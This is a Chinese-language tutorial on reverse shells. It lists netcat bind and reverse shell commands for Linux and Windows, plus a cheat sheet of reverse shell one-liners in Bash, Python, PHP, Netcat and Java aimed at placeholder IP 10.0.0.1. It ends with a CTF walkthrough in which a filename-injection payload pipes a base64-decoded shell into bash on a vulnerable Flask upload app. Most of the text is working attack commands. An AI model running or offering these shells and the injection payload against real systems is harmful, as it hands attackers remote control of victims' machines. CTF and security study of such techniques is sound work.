反弹Shell

1 正向连接

1.1 应用场景

被控端端口无限制，存在命令执行漏洞

1.2 操作指令

1.2.1 被控端为Linux系统

# 被控端Linux
nc -lvp -e [port(8888)] /bin/bash
# 控制端
nc [ip] [port(8888)]

1.2.2 被控端为Windows系统

# 被控端Window
nc -lvp [port(8888)] -e powershell
# 控制端
nc [ip] [port(8888)]

2 反向连接（常用）

2.1 应用场景

需要控制端链接到公网ip

2.2 操作指令

2.2.1 被控端为Linux系统

# 控制端
nc -lvp 8888
# 被控端
nc [公网ip] 8888 -e /bin/bash

2.2.2 被控端为Windows

# 控制端
nc -lvp 8888
# 被控端
nc [公网ip] 8888 -e powershell

2.3 反向连接命令(记得改一下IP和端口)

Bash

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Netcat

nc -e /bin/sh 10.0.0.1 1234

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

更多命令

例题 [CISCN 2023 华北]pysym

源代码

from flask import Flask, render_template, request, send_from_directory
import os
import random
import string
app = Flask(__name__)
app.config['UPLOAD_FOLDER']='uploads'
@app.route('/', methods=['GET'])
def index():
    return render_template('index.html')
@app.route('/',methods=['POST'])
def POST():
    if 'file' not in request.files:
        return 'No file uploaded.'
    file = request.files['file']
    if file.content_length > 10240:
        return 'file too lager'
    path = ''.join(random.choices(string.hexdigits, k=16))
    directory = os.path.join(app.config['UPLOAD_FOLDER'], path)
    os.makedirs(directory, mode=0o755, exist_ok=True)
    savepath=os.path.join(directory, file.filename)
    file.save(savepath)
    try:
     os.system('tar --absolute-names  -xvf {} -C {}'.format(savepath,directory))
    except:
        return 'something wrong in extracting'

    links = []
    for root, dirs, files in os.walk(directory):
        for name in files:
            extractedfile =os.path.join(root, name)
            if os.path.islink(extractedfile):
                os.remove(extractedfile)
                return 'no symlink'
            if  os.path.isdir(path) :
                return 'no directory'
            links.append(extractedfile)
    return render_template('index.html',links=links)
@app.route("/uploads/<path:path>",methods=['GET'])
def download(path):
    filepath = os.path.join(app.config['UPLOAD_FOLDER'], path)
    if not os.path.isfile(filepath):
        return '404', 404
    return send_from_directory(app.config['UPLOAD_FOLDER'], path)
if __name__ == '__main__':
    app.run(host='0.0.0.0',port=1337)

savepath的值是可控的

很明显的命令执行漏洞，利用文件名命令执行

os.system('tar --absolute-names  -xvf {} -C {}'.format(savepath,directory))

#payload
test.txt || echo Your_Reverse_Shell_Code | base64 -d | bash ;